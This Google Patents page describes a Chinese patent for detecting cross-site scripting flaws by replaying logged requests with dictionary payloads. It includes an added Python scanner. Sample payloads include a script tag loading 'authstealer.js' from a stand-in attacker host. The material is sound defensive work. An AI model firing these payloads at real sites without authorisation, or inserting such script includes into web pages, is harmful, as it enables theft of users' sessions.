CN105049440B - Method and system for detecting cross-site scripting attack injection - Google Patents
- Publication number: CN105049440B (application CN201510476875.3A)
- Authority: CN (China)
- Legal status: Active (as listed by Google Patents; the listed status is an assumption, not a legal conclusion)
Classifications
- H04L63/1466: Active attacks involving interception, injection, modification, spoofing of data unit addresses, e.g. hijacking, packet injection or TCP sequence number attacks (under H04L63/1441 Countermeasures against malicious traffic; H04L63/14 Detecting or protecting against malicious traffic; H04L63/00 Network architectures or protocols for network security; H04L Transmission of digital information; H04 Electric communication technique; H Electricity)
- H04L63/1416: Event detection, e.g. attack signature detection (under H04L63/1408 Detecting or protecting against malicious traffic by monitoring network traffic; H04L63/14; H04L63/00; H04L; H04; H)
Abstract
The invention discloses a method and system for detecting cross-site scripting (XSS) injection. The method comprises: a reverse proxy module records the request log of user accesses; the request log is grouped and classified to generate URL parameters, which are saved; the parameter names and parameter values in the URL parameters are detected separately; each parameter value is replaced with the corresponding entry of a script-injection attack dictionary list to generate a second request; the second request is sent to the destination server and the returned response is received; the returned response is checked for attack content; if it contains attack content, the URL parameter is added to an injection risk list. In this way the invention detects the XSS vulnerabilities present in a website more comprehensively, reduces the risk of users being attacked, improves site security, and covers URLs more completely than crawler-based detection.
Description
Technical field
The present invention relates to a method and system for detecting cross-site scripting attack injection.
Background technology
Cross-site scripting (Cross Site Scripting) is abbreviated XSS so that it is not confused with the abbreviation for Cascading Style Sheets (CSS). A malicious attacker inserts malicious HTML code into a web page; when a user browses the page, the HTML code embedded in the page is executed, and the attacker's particular goal against that user is achieved.
XSS is a computer security vulnerability that frequently appears in web applications. It allows a malicious web user to plant code into pages that are served to other users; such code includes HTML code and client-side script. Attackers use XSS vulnerabilities to bypass access controls such as the same-origin policy. These vulnerabilities became widely known because hackers have used them to write more harmful phishing attacks. The consensus in the hacker community on cross-site scripting is that cross-site scripting is the new "buffer overflow attack" and JavaScript is the new "shellcode".
At present, many websites look for cross-site scripting vulnerabilities by crawling the site. Handled this way, request tracking is not comprehensive enough and testing is not complete enough.
An existing patent application (application number 201510046908.0) proposes a cross-site vulnerability scanning method and system. The method comprises the following steps: crawling the links of the whole site or of a single page of the target site; filtering the crawled links with preset conditions to obtain multiple potential cross-site vulnerability links; fuzz testing each potential cross-site vulnerability link with attack vectors; during fuzz testing, dynamically analysing the web page source code of each potential link as viewed in a browsing module, to judge whether the potential link has a cross-site vulnerability; and saving the links that have cross-site vulnerabilities, together with the attack vectors they load, to a database. That patent fuzz-tests every potential link with attack vectors, which is a large workload and demands a high hardware configuration.
The content of the invention
The technical problem to be solved by the invention is: by configuring a reverse proxy module, extracting the variable parameters from all request information, injecting a test dictionary and carrying out cross-site scripting tests to obtain the return values, detect the XSS vulnerabilities present in a website more comprehensively, reduce the risk of users being attacked, improve site security, and cover URLs more completely than crawler-based detection.
To solve the above technical problem, the technical solution adopted by the invention is a method for detecting cross-site scripting attack injection, comprising:
a reverse proxy module records the request log of user accesses;
the request log is grouped and classified to generate URL parameters, which are saved;
the parameter names and parameter values in the URL parameters are detected separately;
each parameter value is replaced with the corresponding entry of a script-injection attack dictionary list to generate a second request;
the second request is sent to the destination server and the returned response is received;
the returned response is checked for attack content;
if it contains attack content, the URL parameter is added to an injection risk list.
To solve the above problem, the invention also provides a system for detecting cross-site scripting attack injection, comprising:
a reverse proxy module, for recording the request log of user accesses;
a classification and saving module, for grouping and classifying the request log, generating URL parameters and saving them;
a detection module, for detecting the parameter names and parameter values in the URL parameters;
a replacement generation module, for replacing each parameter value with the corresponding entry of a script-injection attack dictionary list and generating a second request;
a sending/receiving module, for sending the second request to the destination server and receiving the returned response;
a judgement module, for judging whether the returned response contains attack content;
a list module, for adding the URL parameter to an injection risk list.
The beneficial effects of the invention are: unlike the prior art, by configuring a reverse proxy module, extracting the variable parameters from all the request information, injecting a test dictionary and carrying out cross-site scripting tests to obtain the return values, the invention detects the XSS vulnerabilities present in a website more comprehensively, reduces the risk of users being attacked, improves site security, and covers URLs more completely than crawler-based detection.
Brief description of the drawings
Fig. 1 is a flow chart of method embodiment one of the invention;
Fig. 2 is a flow chart of method embodiment two of the invention;
Fig. 3 is a structural block diagram of system embodiment three of the invention;
Fig. 4 is a structural block diagram of system embodiment four of the invention.
Embodiment
To explain the technical content, objects and effects of the invention in detail, the embodiments are described below with reference to the accompanying drawings.
The key idea of the invention is: requests are analysed and their parameters substituted for cross-site scripting injection, a second request is sent and its response judged, and cross-site scripting injection into the system is thereby detected.
Referring to Fig. 1, embodiment one of the invention provides a method for detecting cross-site scripting attacks, comprising the following steps:
S1: a reverse proxy module records the request log of user accesses;
S2: the request log is grouped and classified to generate URL parameters, which are saved;
S3: the parameter names and parameter values in the URL parameters are detected separately;
S4: each parameter value is replaced with the corresponding entry of a script-injection attack dictionary list to generate a second request;
S5: the second request is sent to the destination server and the returned response is received;
S6: the returned response is checked for attack content;
if it contains attack content, step S7 is performed: the URL parameter is added to an injection risk list.
As shown in Fig. 2, embodiment two of the invention builds on embodiment one and, before step S1, further comprises:
S01: configure the reverse proxy module;
S02: resolve the domain name to the reverse proxy module.
Step S4 is specifically:
S41: replace the parameter value with each entry of the script-injection attack dictionary list in turn;
S42: after the successive replacements, generate at least one corresponding second request.
After step S6, the method further comprises:
if the response does not contain attack content, perform step S70: ignore the returned response.
In a specific embodiment, the following preparation can be made in advance, before defence begins:
configure a reverse proxy module to record all request logs of user accesses. The reverse proxy module may be a reverse proxy server, or an application program with built-in logging that ships with the system, such as IIS, Apache or Nginx. A forward proxy server usually sits on the user's client side, whereas a reverse proxy server is used on the server side.
The advantage of configuring a reverse proxy module, compared with using the logging built into the system directly, is that the original server configuration need not be changed; only the reverse proxy server has to be configured.
After configuration, the domain name is resolved to the reverse proxy module.
During testing, users access the reverse proxy server, which records the content of all requests to the website and saves them as the request log. The URLs in the request log are then grouped and classified by URL and parameters, generating the website's URL parameters. Specifically, the URL is split on ? and &; for example, in http://abc.com/?id=1&name=abc the parameter names are id and name, the corresponding parameter values are 1 and abc, and the parameter-free part of the URL is http://abc.com/.
The program then detects the parameter names and parameter values in the saved URLs separately, and replaces the parameter value 1 with the corresponding entry of a conventional script-injection attack dictionary list to generate the replaced request, i.e. the second request. Specifically, the URL is split on the ? and & keywords, and the parameter values are replaced in turn by regular expression (in the form parameter name=parameter value). The corresponding entries of the attack dictionary list are the keywords or blocks that can commonly be injected, such as the <script></script> tag block and keywords like onclick and javascript. It should be understood that, because the attack dictionary list may contain more than one entry, at least one replaced request is generated after replacement.
The replaced requests are re-sent to the destination server, and the returned response is checked for attack content.
Normally the request can be transmitted to the website under test: an HTTP request is sent to the website being tested, which returns an HTTP response, and the response content is then checked for the attack content carried by the request.
If the response contains the attack content, this URL parameter is added to the XSS injection risk list.
If the response does not contain the attack content, the returned response is ignored, the next second request is sent to the destination server, and steps S5 to S7 are repeated in a loop until all replaced requests have been tested; every URL parameter that meets the condition is added to the XSS injection risk list.
A concrete example is as follows. On the website http://abc.com/, the reverse proxy log records the request GET http://abc.com/?id=1. Using the script-injection attack dictionary (which contains many injectable test cases, to be tried one by one), the parameter value 1 is replaced by regular expression with an attack string from the dictionary (i.e. an entry of the list), such as:
http://abc.com/?id=<script type='text/javascript'>alert('pwnd');</script>; or
<script type='text/javascript'>alert('pwnd');</script>; or
<script%20src="http://mallorysevilsite.com/authstealer.js">.
For instance, this example uses the regular expression (id=)[^&]* with the replacement $1<script type='text/javascript'>alert('pwnd');</script>, and the result is the attack string http://abc.com/?id=<script type='text/javascript'>alert('pwnd');</script>.
It is then detected whether the content of the returned response contains this script, and whether it has been left unescaped. If so, this URL has an injection risk.
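The whole procedure of steps S1 to S7, as an added example that is not code from the patent: constructed reverse-proxy log lines are grouped by path and parameter names, each parameter value is regex-substituted with every dictionary entry, the second request is sent, and the parameter is listed only when the probe comes back verbatim. The log lines, the `XSS_DICTIONARY` entries beyond the two the patent shows, and the `fake_target` stand-in for the destination server are all assumptions made here; the host mallorysevilsite.com is taken from the patent text. The patent's pattern (id=)[^&]* is anchored here so that id does not also match inside a parameter such as uid.

```python
import html
import re
from urllib.parse import quote, unquote

# Script-injection dictionary (steps S4/S41).  The first two entries are the
# probes shown in the patent; the third is an attribute-context probe added here.
XSS_DICTIONARY = [
    "<script type='text/javascript'>alert('pwnd');</script>",
    '<script src="http://mallorysevilsite.com/authstealer.js"></script>',
    '" onclick="alert(1)',
]

# One request line of a reverse-proxy access log (nginx/Apache "combined" style).
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def split_query(query):
    """Steps S2/S3: split the query on '&', then each item on its first '=',
    percent-decoding names and values.  Returns a list of (name, value)."""
    pairs = []
    for item in query.split("&"):
        if item:
            name, _, value = item.partition("=")
            pairs.append((unquote(name), unquote(value)))
    return pairs


def group_request_log(lines):
    """Steps S1/S2: pick the GET requests out of access-log lines and group them
    by (path, sorted parameter names), keeping the first query seen per group."""
    groups = {}
    for line in lines:
        m = LOG_RE.search(line)
        if not m or m.group("method") != "GET":
            continue
        path, _, query = m.group("target").partition("?")
        names = tuple(sorted(name for name, _ in split_query(query)))
        if names:                       # URLs without parameters have nothing to mutate
            groups.setdefault((path, names), query)
    return groups


def substitute_param(query, name, payload):
    """Step S4: regex-replace one parameter's value, as the patent does with
    (id=)[^&]*.  The lookbehind anchors the name so 'id' does not match inside
    'uid'; the payload is percent-encoded so it stays one query value on the wire."""
    pattern = re.compile(r"(?<![^&])(%s=)[^&]*" % re.escape(name))
    return pattern.sub(lambda m: m.group(1) + quote(payload, safe=""), query, count=1)


def judge(body, payload):
    """Step S6: the probe counts only when it comes back verbatim.  An HTML-escaped
    copy (&lt;script&gt;) means the server encoded it and is not flagged."""
    return payload in body


def scan(log_lines, send):
    """Steps S1-S7 end to end.  `send(path, query)` performs the second request
    against the destination server and returns the response body."""
    risk_list = []
    for (path, names), query in group_request_log(log_lines).items():
        for name in names:
            for payload in XSS_DICTIONARY:
                second_request = substitute_param(query, name, payload)   # S4
                body = send(path, second_request)                          # S5
                if judge(body, payload):                                   # S6
                    risk_list.append((path, name, payload))                # S7
                    break           # one reflecting entry is enough to list this parameter
                # S70: no attack content in the response -> ignore it, try the next entry
    return risk_list


def fake_target(path, query):
    """Constructed stand-in for the destination server (not from the patent):
    /search echoes q unescaped (vulnerable); /profile escapes name and never echoes id."""
    params = dict(split_query(query))
    if path == "/search":
        return "<h1>Results for %s</h1>" % params.get("q", "")
    if path == "/profile":
        return "<p>Hello %s</p>" % html.escape(params.get("name", ""), quote=True)
    return "<p>not found</p>"


# Constructed reverse-proxy log lines; the POST and the parameter-less URL are skipped.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Aug/2015:10:00:01 +0800] "GET /search?q=shoes HTTP/1.1" 200 512',
    '10.0.0.5 - - [06/Aug/2015:10:00:02 +0800] "GET /profile?id=1&name=abc HTTP/1.1" 200 300',
    '10.0.0.9 - - [06/Aug/2015:10:00:03 +0800] "GET /search?q=boots HTTP/1.1" 200 498',
    '10.0.0.9 - - [06/Aug/2015:10:00:04 +0800] "POST /login HTTP/1.1" 302 0',
    '10.0.0.9 - - [06/Aug/2015:10:00:05 +0800] "GET /static/app.js HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for path, name, payload in scan(SAMPLE_LOG, fake_target):
        print("XSS injection risk: %s parameter %r reflects %r" % (path, name, payload))
```

Only /search with parameter q ends up in the risk list: /profile escapes name and never reflects id, so every dictionary entry is ignored there, which is the S70 branch. Two points a practitioner should keep in mind when running this against a real destination server: the verbatim check only recognises the HTML-body context the patent describes, so a probe that lands inside an attribute or a JavaScript string needs its own judging rule; and the second requests are live requests, so if the site stores what it receives, the probes can persist as stored XSS, which argues for running the loop against a staging copy.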
In summary, the embodiment of the invention records the request log through the reverse proxy module and resolves the domain name to it; after grouping and classifying the log it generates the URL parameters as the basis and preparation for defence; it then injects the test dictionary, performs XSS injection tests on the parameters, obtains the return values and checks them for attack content, and finally records the confirmed cases in the injection risk list. Embodiment two of the invention can therefore detect the XSS injection vulnerabilities present in a website more comprehensively, reduce the risk of users being attacked, improve site security, and cover URLs more completely than crawler-based detection.
Further, as shown in Fig. 3, embodiment three of the invention provides a system 100 for detecting cross-site scripting attacks, comprising:
a reverse proxy module 110, for recording the request log of user accesses;
a classification and saving module 120, for grouping and classifying the request log, generating URL parameters and saving them;
a detection module 130, for detecting the parameter names and parameter values in the URL parameters;
a replacement generation module 140, for replacing each parameter value with the corresponding entry of a script-injection attack dictionary list and generating a second request;
a sending/receiving module 150, for sending the second request to the destination server 200 and receiving the returned response;
a judgement module 160, for judging whether the returned response contains attack content;
a list module 170, for adding the URL parameter to an injection risk list.
The system 100 of embodiment four further comprises:
a configuration module 180, for configuring the reverse proxy service module;
a resolution module 190, for resolving the domain name to the reverse proxy service module.
The replacement generation module 140 further comprises:
a replacement unit 141, for replacing the parameter value with each entry of the script-injection attack dictionary list in turn;
a generation unit 142, for generating the corresponding second requests after the successive replacements.
When the judgement module 160 judges that the returned response does not contain attack content, the returned response is ignored.
The foregoing are only embodiments of the invention and do not limit its scope of protection; all equivalent variations made using the description and drawings of the invention, or direct or indirect uses in related technical fields, are likewise included in the scope of patent protection of the invention.
Claims (6)
- 1. A method for detecting cross-site scripting attack injection, characterised in that it comprises: a reverse proxy module records the request log of user accesses; the request log is grouped and classified to generate URL parameters, which are saved; the parameter names and parameter values in the URL parameters are detected separately; each parameter value is replaced with the corresponding entry of a script-injection attack dictionary list to generate a second request; the second request is sent to the destination server and the returned response is received; the returned response is checked for attack content; if it contains attack content, the URL parameter is added to an injection risk list; wherein the step of replacing the parameter value with the corresponding entry of the script-injection attack dictionary list and generating the second request is specifically: replacing the parameter value with each entry of the script-injection attack dictionary list in turn; and, after the successive replacements, generating at least one corresponding second request.
- 2. The method for detecting cross-site scripting attack injection according to claim 1, characterised in that, before the step in which the reverse proxy module records the request log of user accesses, it further comprises: configuring the reverse proxy module; and resolving the domain name to the reverse proxy module.
- 3. The method for detecting cross-site scripting attack injection according to claim 1, characterised in that, after the step of judging whether the returned response contains attack content, it further comprises: if it does not, ignoring the returned response.
- 4. A system for detecting cross-site scripting attack injection, characterised in that it comprises: a reverse proxy module, for recording the request log of user accesses; a classification and saving module, for grouping and classifying the request log, generating URL parameters and saving them; a detection module, for detecting the parameter names and parameter values in the URL parameters; a replacement generation module, for replacing each parameter value with the corresponding entry of a script-injection attack dictionary list and generating a second request; a sending/receiving module, for sending the second request to the destination server and receiving the returned response; a judgement module, for judging whether the returned response contains attack content; and a list module, for adding the URL parameter to an injection risk list.
- 5. The system for detecting cross-site scripting attack injection according to claim 4, characterised in that it further comprises: a configuration module, for configuring the reverse proxy service module; and a resolution module, for resolving the domain name to the reverse proxy service module.
- 6. The system for detecting cross-site scripting attack injection according to claim 4, characterised in that, after the judgement module judges that the returned response does not contain attack content, the returned response is ignored.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201510476875.3A CN105049440B (en) | 2015-08-06 | 2015-08-06 | Method and system for detecting cross-site scripting attack injection |
Publications (2)
Publication Number | Publication Date |
---|---|
CN105049440A CN105049440A (en) | 2015-11-11 |
CN105049440B true CN105049440B (en) | 2018-04-10 |
Family
ID=54455651
Families Citing this family (10)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN107948120B (en) * | 2016-10-12 | 2020-11-24 | 阿里巴巴集团控股有限公司 | Vulnerability detection method and device |
CN106446694A (en) * | 2016-12-13 | 2017-02-22 | 四川长虹电器股份有限公司 | Xss vulnerability mining system based on network crawlers |
CN108632219B (en) * | 2017-03-21 | 2021-04-27 | 腾讯科技(深圳)有限公司 | Website vulnerability detection method, detection server, system and storage medium |
CN108667770B (en) * | 2017-03-29 | 2020-12-18 | 腾讯科技(深圳)有限公司 | Website vulnerability testing method, server and system |
CN109040054B (en) * | 2018-07-30 | 2020-12-04 | 杭州迪普科技股份有限公司 | URL filtering test method and device |
CN111104675A (en) * | 2019-11-15 | 2020-05-05 | 泰康保险集团股份有限公司 | Method and device for detecting system security vulnerability |
CN113364815B (en) * | 2021-08-11 | 2021-11-23 | 飞狐信息技术(天津)有限公司 | Cross-site scripting vulnerability attack defense method and device |
CN113965363B (en) * | 2021-10-11 | 2023-07-14 | 北京天融信网络安全技术有限公司 | Vulnerability research and judgment method and device based on Web user behaviors |
CN114205123A (en) * | 2021-11-20 | 2022-03-18 | 湖北天融信网络安全技术有限公司 | Attack and defense confrontation-based threat hunting method, device, equipment and storage medium |
CN114816558B (en) * | 2022-03-07 | 2023-06-30 | 深圳市九州安域科技有限公司 | Script injection method, equipment and computer readable storage medium |
Citations (3)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN102880830A (en) * | 2011-07-15 | 2013-01-16 | 华为软件技术有限公司 | Acquisition method and device of original test data |
CN102999420A (en) * | 2011-09-13 | 2013-03-27 | 阿里巴巴集团控股有限公司 | XSS (Cross Site Scripting) testing method and XSS testing system based on DOM (Document Object Model) |
CN103023869A (en) * | 2012-11-02 | 2013-04-03 | 北京奇虎科技有限公司 | Malicious attack prevention method and browser |
Family Cites Families (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN103067344B (en) * | 2011-10-24 | 2016-03-30 | 国际商业机器公司 | The noninvasive method of automatic distributing safety regulation and equipment in cloud environment |
Timeline: 2015-08-06, application CN201510476875.3A filed in CN; granted as CN105049440B, status Active.
Legal Events
Date | Code | Title | Description |
---|---|---|---|
C06 | Publication | ||
PB01 | Publication | ||
C10 | Entry into substantive examination | ||
SE01 | Entry into force of request for substantive examination | ||
GR01 | Patent grant | ||